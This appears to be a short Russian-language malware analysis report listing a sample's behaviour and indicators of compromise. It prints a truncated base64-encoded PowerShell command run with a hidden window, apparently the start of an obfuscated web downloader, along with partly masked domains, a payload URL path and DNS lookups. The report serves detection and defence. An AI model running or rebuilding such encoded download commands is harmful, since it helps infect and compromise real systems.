Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAQwBBADQAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYgBBAEMAUQBCACcALAAnAHcAJwApADsAJABSAEIAXwBBAGsAVQBBAF8APQBuAGUAdwBgAC0ATwBiAGAASgBgAEUAYwBUACAAKAAnAE4AZQB0AC4AVwAnACsAJwBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\804122.cvr
- 'ew##c.com':80
- 'pe####profilers.vn':443
- 'wo######s.carelesscloud.com':443
- 'tr##ay.com':443
- http://ew##c.com/wp-snapshots/P_a/
- 'pe####profilers.vn':443
- DNS ASK ew##c.com
- DNS ASK pe####profilers.vn
- DNS ASK 11##o.com
- DNS ASK wo######s.carelesscloud.com
- DNS ASK tr##ay.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAQwBBADQAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYgBBAEMAUQBCACcALAAnAHcAJwApADsAJABSAEIAXwBBAGsAVQBBAF8APQBuAGUAdwBgAC0ATwBiAGAASgBgAEUAYwBUACAAKAAnAE4AZQB0AC4AVwAnACsAJwBlAG...' (со скрытым окном)